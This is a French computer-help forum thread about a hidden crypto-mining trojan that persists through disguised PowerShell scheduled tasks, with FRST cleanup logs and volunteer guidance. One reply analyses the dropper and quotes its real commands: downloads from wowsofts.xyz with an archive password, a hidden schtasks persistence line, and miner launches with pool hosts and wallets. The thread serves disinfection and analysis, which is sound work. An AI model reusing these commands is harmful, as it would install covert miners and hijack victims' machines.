Trojan Miner caché [Résolu]

Aide à la désinfection pour supprimer les virus, adwares, ransomwares, trojans.

Modérateurs : Mods Windows, Helper

alboon2000
Messages : 12
Inscription : 05 juil. 2023 08:12

Trojan Miner caché [Résolu]

par alboon2000 »

Bonjour,

Je me suis aperçu, en monitorant la température de mon GPU, que celui-ci était sollicité "sans raison".
Windows Defender n'a rien trouvé.
J'ai installé Malwarebytes et il m'a trouvé ceci :
- C:\windows\link.zip (riskware.CoinMiner)
- C:\windows\svshost.exe (generic malware/suspicious)
- C:\windows\svhost.exe (backdoor.bot)

(Plus quelques éléments de uTorrent, mais ce n'est pas ça car je l'utilise depuis des années)

Une fois ceci mis en quarantaine, la température est redescendue.

Sauf que...
C'est revenu le lendemain !

J'ai regardé dans les tâches et je n'ai rien vu de suspect, mais je n'y connais pas grand chose là dedans (à part un éventuel "ViGEmBusUpdater1" ?)

J'ai donc laissé tourner Malwarebytes en fond et ça m'a bloqué quelques trucs (cf pièce jointe) : essentiellement des "sites web" via le port 3389, ou 443. Je précise que le port 443 n'a jamais été ouvert dans le NAT.

https://ibb.co/xg7CCss

J'ai donc désactivé le port 3389 dans le NAT du routeur, mais du coup, plus de RDP possible.

J'ai tout scanné avec Windows Defender et Malwarebytes Anti-Malware (MBAM) (disque C, disques internes, et NAS) : RAS... Mais on m'a fait comprendre que l'utilisation de svchost.exe veut dire que le malware l'utilise à son avantage et a donc probablement infecté le registre... Comment vérifier ?

Merci !
Vous ne pouvez pas consulter les pièces jointes insérées à ce message.
Dernière modification par alboon2000 le 05 juil. 2023 08:38, modifié 3 fois.
Malekal_morte
Messages : 116536
Inscription : 10 sept. 2005 13:57

Re: Trojan Miner caché

par Malekal_morte »

Bonjour,

En effet, on ne voit rien sur la capture.
Tu peux aussi exporter le rapport MBAM en fichier texte et le fournit ici.

Suis le tutoriel FRST. ( prends le temps de lire attentivement - tout y est bien expliqué ).

Attendre la fin du scan, un message indique que l'analyse est terminée.
Télécharge et lance le scan FRST,

Trois rapports FRST seront générés :
* FRST.txt
* Shortcut
* Additionnal.txt

Image

Envoie ces 3 rapports sur le site https://pjjoint.malekal.com/ et en retour donne les 3 liens pjjoint qui mènent aux rapports ici dans une nouvelle réponse afin que l'on puisse les consulter.

(Les liens bleus mènent à des tutoriels explicatifs pas à pas, clic dessus pour avoir les instructions plus précises à suivre).
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Evaluer le site malekal.com
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
alboon2000
Messages : 12
Inscription : 05 juil. 2023 08:12

Re: Trojan Miner caché

par alboon2000 »

(A venir)
Avatar de l’utilisateur
angelique
Messages : 32347
Inscription : 28 févr. 2008 13:58
Localisation : Breizhilienne

Re: Trojan Miner caché

par angelique »

Bonjour/Bonsoir





Image Télécharge à coté de FRST64.EXE , PAS AILLEURS !!!!! le fichier fixlist.txt en pièce jointe en bas du message.

➯ Relance FRST64(clic droit exécuter en tant qu'administrateur) et clic sur le bouton corriger/fix
Un redémarrage peut être nécessaire (pas obligatoire).
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message avec ton commentaire.

/!\ Ce script a été établi pour cet utilisateur, il ne doit, en aucun cas, être appliqué sur un autre système, au risque de provoquer de graves dysfonctionnements et endommager Windows /!\

et refait un mbam pour vérifier ;)
Vous ne pouvez pas consulter les pièces jointes insérées à ce message.
Avec Gnu_Linux t'as un Noyau ... avec Ѡindows t'as que les pépins
https://helicium.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Un p'tit Don à Angélique PDT_018 Merci.
Image
alboon2000
Messages : 12
Inscription : 05 juil. 2023 08:12

Re: Trojan Miner caché

par alboon2000 »

Bonjour et merci ! Résultat :

Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 05-07-2023
Exécuté par alboon (06-07-2023 08:43:55) Run:1
Exécuté depuis C:\Users\alboo\Desktop
Profils chargés: alboon & Audre & arnau
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************
CreateRestorePoint:
Task: {735C77C6-ADA3-41AD-9C3C-95A46433ED61} - System32\Tasks\MSI Task Host - Detect_Monitor => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [491520 2023-05-09] (Microsoft Windows -> Microsoft Corporation) -> -ExecutionPolicy ByPass -WindowStyle Hidden C:\Users\alboo\AppData\Roaming\Winsoft\core.ps1
Task: {FF7B7340-7870-4A3C-9CF1-403EFDF12B98} - System32\Tasks\ViGEmBusUpdater1 => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [491520 2023-05-09] (Microsoft Windows -> Microsoft Corporation) -> -ExecutionPolicy Bypass C:\WINDOWS\core.ps1
C:\Users\alboo\AppData\Roaming\Winsoft
S3 ew_usbccgpfilter; \SystemRoot\System32\drivers\ew_usbccgpfilter.sys [X]
U4 npcap_wifi; pas de ImagePath
S1 WinSetupMon; system32\DRIVERS\WinSetupMon.sys [X]
2021-08-01 17:02 - 2021-08-01 17:02 - 000001792 _____ () C:\Users\alboo\AppData\Local\recently-used.xbel
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiSpyware] Restriction <==== ATTENTION
HKLM\SOFTWARE\Microsoft\Windows Defender: [DisableAntiVirus] Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Restriction <==== ATTENTION
EmptyTemp:


*****************

Le Point de restauration a été créé avec succès.
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{735C77C6-ADA3-41AD-9C3C-95A46433ED61}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{735C77C6-ADA3-41AD-9C3C-95A46433ED61}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\MSI Task Host - Detect_Monitor => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\MSI Task Host - Detect_Monitor" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FF7B7340-7870-4A3C-9CF1-403EFDF12B98}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FF7B7340-7870-4A3C-9CF1-403EFDF12B98}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\ViGEmBusUpdater1 => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ViGEmBusUpdater1" => supprimé(es) avec succès
C:\Users\alboo\AppData\Roaming\Winsoft => déplacé(es) avec succès
HKLM\System\CurrentControlSet\Services\ew_usbccgpfilter => supprimé(es) avec succès
ew_usbccgpfilter => service supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\npcap_wifi => supprimé(es) avec succès
npcap_wifi => service supprimé(es) avec succès
HKLM\System\CurrentControlSet\Services\WinSetupMon => supprimé(es) avec succès
WinSetupMon => service supprimé(es) avec succès
C:\Users\alboo\AppData\Local\recently-used.xbel => déplacé(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows Defender\\"DisableAntiSpyware"="0" => valeur restauré(es) avec succès
HKLM\SOFTWARE\Microsoft\Windows Defender\\"DisableAntiVirus"="0" => valeur restauré(es) avec succès
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate => supprimé(es) avec succès

=========== EmptyTemp: ==========

FlushDNS => terminé(e)
BITS transfer queue => 1310720 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 128307823 B
Java, Discord, Steam htmlcache, WinHttpAutoProxySvc/winhttp *.cache => 307802717 B
Windows/system/drivers => 1218794174 B
Edge => 0 B
Chrome => 718857115 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 0 B
systemprofile32 => 0 B
LocalService => 1577393581 B
NetworkService => 1578106135 B
alboo => 1824883071 B
Audre => 1874877981 B
arnau => 1890766897 B

RecycleBin => 2900227423 B
EmptyTemp: => 13.1 GB données temporaires supprimées.

================================


Le système a dû redémarrer.

==== Fin de Fixlog 08:44:15 ====

========================================================================================
Petite question bonus :
MBAM n'a rien détecté, mais bloque parfois des "sites web" type "connexion sortante", via le fichier utorrent ou déluge, bref, rien de très inquiétant je pense. Mais surtout, il y a quelquesfois un domaine wowsofts.xyz bloqué, et dans "fichier" c'est powershell.exe qui est écrit... C'est quoi ?
Avatar de l’utilisateur
angelique
Messages : 32347
Inscription : 28 févr. 2008 13:58
Localisation : Breizhilienne

Re: Trojan Miner caché

par angelique »

Mais surtout, il y a quelquesfois un domaine wowsofts.xyz bloqué, et dans "fichier" c'est powershell.exe qui est écrit... C'est quoi ?
c'était des taches planifiées powershell qui devaient se connecter vers wowsofts.xyz pour récupérer le dropper/malware miner , qu'on a supprimé :

Task: {735C77C6-ADA3-41AD-9C3C-95A46433ED61} - System32\Tasks\MSI Task Host - Detect_Monitor => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [491520 2023-05-09] (Microsoft Windows -> Microsoft Corporation) -> -ExecutionPolicy ByPass -WindowStyle Hidden C:\Users\alboo\AppData\Roaming\Winsoft\core.ps1
Task: {FF7B7340-7870-4A3C-9CF1-403EFDF12B98} - System32\Tasks\ViGEmBusUpdater1 => C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [491520 2023-05-09] (Microsoft Windows -> Microsoft Corporation) -> -ExecutionPolicy Bypass C:\WINDOWS\core.ps1

ça doit plus le faire depuis la correction ?
Avec Gnu_Linux t'as un Noyau ... avec Ѡindows t'as que les pépins
https://helicium.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Un p'tit Don à Angélique PDT_018 Merci.
Image
alboon2000
Messages : 12
Inscription : 05 juil. 2023 08:12

Re: Trojan Miner caché

par alboon2000 »

J'ai stoppé Déluge et je regarde ce qu'il se passe, et je vous dis.

Et, en supposant que grâce à ça MBAM ne signale plus rien : est-ce que ça veut dire que lorsque ce logiciel est en fonctionnement, et sans la présence de MBAM, toutes ces tentatives seraient fructueuses ? Je n'ai pas trouvé comment regarder ce que le parefeu de Windows bloquait. Je ne sais du coup pas s'il est configuré correctement...
Avatar de l’utilisateur
angelique
Messages : 32347
Inscription : 28 févr. 2008 13:58
Localisation : Breizhilienne

Re: Trojan Miner caché

par angelique »

Tant que les tasks powershell étaient présentes, ça rapatriait le miner qui fesait tourner ton GPU.

Maintenant que c'est supprimé, ç'est bon

Supprime C:\FRST
Avec Gnu_Linux t'as un Noyau ... avec Ѡindows t'as que les pépins
https://helicium.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Un p'tit Don à Angélique PDT_018 Merci.
Image
alboon2000
Messages : 12
Inscription : 05 juil. 2023 08:12

Re: Trojan Miner caché

par alboon2000 »

Merci, je n'ai plus aucune notification de la part de MBAM maintenant :)

Cependant, les tâches supprimées provenaient de MSI, ou autres "trucs" a priori pas dangereux, bizarre ! Enfin bref, merci encore c'est impeccable !
Avatar de l’utilisateur
Dutchman24
Messages : 2
Inscription : 11 sept. 2023 09:51

Re: Trojan Miner caché [Résolu]

par Dutchman24 »

J'ai rencontré un problem similaire avec avec un GPU crypto miner Xmrig qui se trouvait dans c:\Windows dans une fichier DLhost.exe ensemble avec une ficher .bat (bb.bat). qui déclenchait un powershell script dans une dossier bluetooth.
Malware bytes avait détecté le virus et supprimé le dlhost, mais pas le bb.bat, j'ai manuellement supprimé bb.bat.
Le lendemain le fichier était revenu, donc rebelote.
Je cherché dans la planificateur de taches et j'ai trouvé 3 tache suspicieux dont un dans le dossier microsoft/windows/bluetooth un dans /wininet que j'ai supprimé et un tache qui explique pourquoi le virus est revenu.

MSI Task Host - Detect_Monitor
Action: Démarrer un programme "powershell" -ExecutionPolicy ByPass -WindowStyle Hidden C:\Users\Me\AppData\Roaming\Winsoft\core.ps1
Déclencheurs: À 15h28 le 23/08/23 - Apres déclenchement recommencer tout les 06:00 heures indéfiniment

Le dossier Winsoft est également créer le 23/08/23 et contiens 3 fichiers. - Donc taches et Dossier Winsoft à supprimer !
Malekal_morte
Messages : 116536
Inscription : 10 sept. 2005 13:57

Re: Trojan Miner caché [Résolu]

par Malekal_morte »

Salut,

Merci pour les infos.
C'est le même apparemment vu qu'il est présent dans le script FRST.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Evaluer le site malekal.com
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Vegeta
Messages : 6
Inscription : 15 sept. 2023 12:16

Re: Trojan Miner caché [Résolu]

par Vegeta »

Je pense avoir été dans le même cas, pour ma part, semble être corrélé à l'installation de FL STUDIO téléchargé sur (site de torrent)
miner folder content.jpg

Partie 1
%appdata %Winsoft, contenant :
• core.bin
• core.ps1
• k

Le script « core.ps1 » s’occupe de déchiffrer « core.bin » à l’aide de la clé « k ».
Le contenu déchiffré, du script powershell, est ensuite exécuté à l’aide d’un « Invoke-Expression $decryptedScript » ($decryptedScript étant la variable contenant le contenu déchiffré).
Le contenu, redirigé dans un fichier txt « sample_core.txt » contient ces instructions.

Code : Tout sélectionner

Les instructions sont : 
    • test si AntiVirus autre que Windows Defender
        ◦ OUI : EXIT
        ◦ NON : CONTINUE
    • test si le site « hxxps://wowsofts.xyz/ceo » répond
        ◦ Http response = 200 : CONTINUE
        ◦ Http response!= 200 : EXIT
        ◦ Erreur (catch du Try/Catch) : EXIT
    • Recherche si les tâches planifiées sont présentes
        ◦ UninstallDeviceTask
        ◦ ViGEmBusUpdater1
    • Si elles sont présentes, on les arrête et on les supprime
    • Recherche si les processus suivants sont en cours
        ◦ svhost
        ◦ svshost
        ◦ DlHost
    • Si les processus sont en cours, on force leurs arrêts
    • Téléchargement de 7zip standalone
        ◦ hxxps://wowsofts.xyz/7za.exe → c:\windows\7za.exe
    • Téléchargement d’un fichier d’archive « zipG.zip »
        ◦ Invoke-WebRequest -Uri "hxxps://wowsofts.xyz/ceo" -OutFile c:\windows\zipG.zip
    • Utilisation de 7zip pour décompresser « zipG.zip », à l’aide du mot de passe «2JYKezj76c3Ef6bZ »
    • Fichier contenant : 
        ◦ bb.bat
        ◦ DlHost.exe
        ◦ key (fichier texte, contenant une clé)
        ◦ mid.bin
        ◦ mid.ps1
        ◦ svshost.exe
        ◦ WinRing0x64.sys
    • Suppression de « zipG.zip »
    • Suppression de « 7za.exe »
    • Exécution du batch « bb.bat »
        ◦ $batchFilePath = Join-Path -Path $outputPath -ChildPath "bb.bat"
        ◦ Start-Process -FilePath "cmd.exe" -ArgumentList "/c $batchFilePath" -Verb RunAs -WindowStyle Hidden
        ◦ Ce batch va créer une tâche planifiée, qui s’occupera de lancer « mid.ps1 »
        ◦ schtasks /Create /TN "\Microsoft\Windows\Bluetooth\UninstallDeviceTask" /SC MINUTE /MO 1 /RL HIGHEST /TR "powershell -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\WINDOWS\mid.ps1" /F
Partie 2
Lorsque la tâche planifiée «  UninstallDeviceTask » se lancera, elle va exécuter le script powershell « mid.ps1 ».
Le script va  déchiffrer « mid.bin » à l’aide de la clé « key », et exécuter ce contenu déchiffré qui est un script powershell.
Extraction du contenu dans « sample.txt ».
Ces instructions vont : 
    • Vérifier si le taskmanager est ouvert
        ◦ OUI 
            ▪ Depuis plus de 30 minutes : Fermer le taskmanager
            ▪ Si $puttyprocess a été exécuté (« dlhost.exe »)
                • OUI : Fermer/Kill le process « dlhost.exe »
            ▪ Idem pour $saashostprocess (« svshost.exe »)
                • OUI : Fermer/Kill le process « svshost.exe »
        ◦ NON
            ▪ lastState not equal « IDLE »
                • $puttyProcess = Start-Process -FilePath "DlHost.exe" -ArgumentList "-o educu.xyz:33333 --http-enabled --api-worker-id vick --http-host 127.0.0.1 --http-port 22222  --http-no-restricted --http-access-token 123" -NoNewWindow -PassThru
                • $saashostProcess = Start-Process -FilePath "svshost.exe" -ArgumentList "-a kawpow -s 	de.neoxa.herominers.com:1202 -u GWEYD3rAPcKJnnAQi9kKXSKXwnzNbfmfR2.Rigo -w 0 --api 127.0.0.1:5555" -NoNewWindow -PassThru
            ▪ lastState not equal « ACTIVE »
                • $puttyProcess = Start-Process -FilePath "DlHost.exe" -ArgumentList "--cpu-max-threads-hint=30 -o educu.xyz:33333 --http-enabled --api-worker-id vick --http-host 127.0.0.1 --http-port 22222  --http-no-restricted --http-access-token 123" -NoNewWindow -PassThru
                • $saashostProcess = Start-Process -FilePath "svshost.exe" -ArgumentList "-a radiant -s pool.woolypooly.com:3122 -u 1Q1XnAUdsewFm1EfoTW5Dkj18AwfhJA4Wt.Rigo -i 30 -w 0 --api 127.0.0.1:5555" -NoNewWindow -PassThru
Vous ne pouvez pas consulter les pièces jointes insérées à ce message.
Malekal_morte
Messages : 116536
Inscription : 10 sept. 2005 13:57

Re: Trojan Miner caché [Résolu]

par Malekal_morte »

Salut,

Si tu as besoin d'aide pour désinfecter ton PC, il faut effectuer l'analyse FRST comme demandé en début de ce sujet.
Fournir les rapports via pjjoint.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Evaluer le site malekal.com
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Benjamin12345
Messages : 3
Inscription : 14 mars 2024 11:08

Re: Trojan Miner caché [Résolu]

par Benjamin12345 »

Bonjour à tous,

Je rencontre exactement le même problème que alboon2000.

Malwarebytes Anti-Malware (MBAM) détecte deux fichiers dangereux, et même après les avoir placés en quarantaine et supprimés, ils réapparaissent quelques heures ou le lendemain systématiquement.

Voici les fichiers détectés :
- RiskWare.CoinMiner, C:\WINDOWS\LINK.ZIP
- RiskWare.CoinMiner, C:\WINDOWS\SVSHOST.EXE
Capture d'écran :
Riskware-CoinMiner.png
J'ai également installé FRST64 et réalisé une analyse :
- FRST.txt : https://pjjoint.malekal.com/files.php?r ... 2s10h108h5
- Addition.txt : https://pjjoint.malekal.com/files.php?r ... 12d13t5r13
- Shortcut.txt : https://pjjoint.malekal.com/files.php?r ... _5f11l76j5

Pouvez-vous me venir en aide pour la suite ?

En vous remerciant d'avance,
Vous ne pouvez pas consulter les pièces jointes insérées à ce message.
  • Sujets similaires
    Réponses
    Vues
    Dernier message

Revenir à « Supprimer/Desinfecter les virus (Trojan, Adwares, Ransomwares, Backdoor, Spywares) »